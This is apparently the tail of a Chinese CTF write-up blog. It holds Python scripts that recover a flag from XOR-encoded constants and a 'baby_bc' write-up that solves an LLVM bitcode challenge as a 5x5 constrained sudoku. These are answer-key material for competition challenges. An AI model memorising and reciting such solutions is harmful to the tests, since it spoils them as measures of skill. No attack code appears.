  0x00, 0x00, 0x4A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x4B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x51, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x55, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x5A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x5D, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x5E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x69, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6F, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x71, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x7B, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x7D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7E, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x85, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x86, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x87, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x89, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x8B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x8C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8D, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8E, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x8F, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x91, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x92, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x93, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x99, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x9A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x9B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9C, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9D, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x9E, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x9F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA1, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA2, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xA3, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xA5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA6, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA7, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xA9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xAA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAB, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAC, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xAE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xAF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB1, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xB2, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xB3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xB4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB5, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB6, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xB7, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBA, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBB, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xBC, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xBD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xBE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xC1, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC4, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC5, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xC6, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC9, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xCB, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xCD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCE, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xD1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xD2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD3, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xD5, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xD6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xD7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD8, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD9, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xDA, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xDB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xDC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDD, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDE, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xE1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE3, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xE6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE7, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xEA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xEB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEC, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xED, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xEE, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xEF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF1, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF2, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xF3, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xF5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF6, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF7, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xF9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xFA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFB, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFC, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xFD, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xFE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]

a = 0x5F53055504525E54
b = 0x3025156540750
c = 0x57

flag_str = ''

for _ in range(8):
    i = a % 256
    a //= 256
    flag_str += chr(i^0x66)

for _ in range(8):
    i = b % 256
    b //= 256
    flag_str += chr(i^0x66)

flag_str += chr(ord('W')^0x66)
print(flag_str)

def f(n):
    if n == 1:
        return 2
    else:
        result = 2 * f(n-1)
        ans = 2 ** ( 2 * n -3 )
        ans += result
        return ans

tmp = [2, 6, 3, 4, 0, 2, 12, 5]

chars = [
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x36, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x21, 0x3D, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA7, 0x49, 0x01, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0xAC, 0x43, 0x02, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xBE, 0xB5, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x61, 0xDC, 0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x0F, 
  0x6C, 0x01, 0x00, 0x00, 0x00, 0x00, 0x32, 0xC4, 0x62, 0x02, 
  0x00, 0x00, 0x00, 0x00, 0x99, 0xE2, 0xAC, 0x04, 0x00, 0x00, 
  0x00, 0x00, 0x2A, 0xC9, 0xFB, 0x10, 0x00, 0x00, 0x00, 0x00, 
  0xFD, 0xCD, 0x9E, 0x32, 0x00, 0x00, 0x00, 0x00, 0x70, 0x74, 
  0x0D, 0x37, 0x00, 0x00, 0x00, 0x00
]

num = 0 ; sum = 0
for i in chars:
    if num == 8:
        num = 0
        sum %= 8
        print(flag_str[tmp[sum-1]],end='')
        sum = 0
    sum += i * (256 ** num)
    num += 1
else:
    print()

baby_bc

bc全称bitcode，是一种中间语言。资料链接如下：

https://blog.csdn.net/chqj_163/article/details/90238350

利用llvm可以反编译源码或者直接编译成可执行程序。这里我做这道题的时候是队友直接给我的编译好的可执行文件。

IDA一条龙发现，逻辑十分简单，就是一个5x5的数独，三张表，一张表是地图，一张是每一行内的自定义约束规则，一张是每一列内的自定义约束规则，可以手算可以写脚本，5x5其实直接手算就行.

解数独脚本如下：（注意程序中有 一个输入检验函数要求初始地图已经给出的数据的位置 输入为 0）

def print_grid(arr):
    for i in range(5):
        for j in range(5):
            # 注意，在py3.x中，print函数默认都有换行
            print(arr[i][j], end="")
        print()

# 找出目前没有被赋值的位置，若全部都被填满，则返回False
def find_empty_location(arr, l):
    for row in range(5):
        for col in range(5):
            if arr[row][col] == 0:
                l[0] = row
                l[1] = col
                # print("empty: row="+str(row)+" col="+str(col))
                return True
    return False

# 找出num在该arr的row行是否出现过
def used_in_row(arr, row, num):
    for i in range(5):
        if arr[row][i] == num:
            return True
    return False

# 找出num在该arr的col列是否出现过
def used_in_col(arr, col, num):
    for i in range(5):
        if arr[i][col] == num:
            return True
    return False

def check_location_is_safe(arr, row, col, num):
    return not used_in_row(arr, row, num) and not used_in_col(arr, col, num)

def solve_sudoku(arr):
    # 当前搜索的第几行、第几列
    l = [0, 0]
    # 找出还未被填充的位置
    if not find_empty_location(arr, l):
        return True
    # 未被填充的位置，赋值给row，col
    row = l[0]
    col = l[1]

    for num in range(1, 6):
        if check_location_is_safe(arr, row, col, num):
            arr[row][col] = num
            #print_grid(arr)
            if solve_sudoku(arr):
                row_123 = [[0x00, 0x00, 0x00, 0x01],
                [0x01, 0x00, 0x00, 0x00],
                [0x02, 0x00, 0x00, 0x01],
                [0x00, 0x00, 0x00, 0x00],
                [0x01, 0x00, 0x01, 0x00]]
                col_123 = [[0x00, 0x00, 0x02, 0x00, 0x02],
                [0x00, 0x00, 0x00, 0x00, 0x00],
                [0x00, 0x00, 0x00, 0x01, 0x00],
                [0x00, 0x01, 0x00, 0x00, 0x01]]
                flag = 1
                for i in range(20):
                    if row_123[i//4][i%4] == 1:
                        if arr[i//4][i%4] < arr[i//4][i%4+1]:
                            flag = 0
                            break
                    elif row_123[i//4][i%4] == 2:
                        if arr[i//4][i%4] > arr[i//4][i%4+1]:
                            flag = 0
                            break
                    else:
                        pass
                    
                    if col_123[i//5][i%5] == 1:
                        if arr[i//5][i%5] > arr[i//5+1][i%5]:
                            flag = 0
                            break
                    elif col_123[i//5][i%5] == 2:
                        if arr[i//5][i%5] < arr[i//5+1][i%5]:
                            flag = 0
                            break
                    else:
                        pass

                if flag == 1:
                    print_grid(grid)
                    print()
                    print()
            # 若当前num导致未来并没有结果，则当前所填充的数无效，置0后选下一个数测试
            arr[row][col] = 0
        

    return False


if __name__ == "__main__":
    #grid = [[0 for x in range(5)] for y in range(5)]
    grid = [[ 0, 0, 0, 0,0],
            [0, 0, 0, 0, 0],
            [0, 0, 4, 0, 0],
            [0, 0, 0, 3, 0],
            [0,0, 0, 0, 0]]
    solve_sudoku(grid)

HMI

敬请期待2333

Web(请点击跳转)

查看评论

1. Misc
2. Crypto
3. Pwn
1. 3.1. pwny
2. 3.2. lonelywolf
4. Re
5. Web(请点击跳转)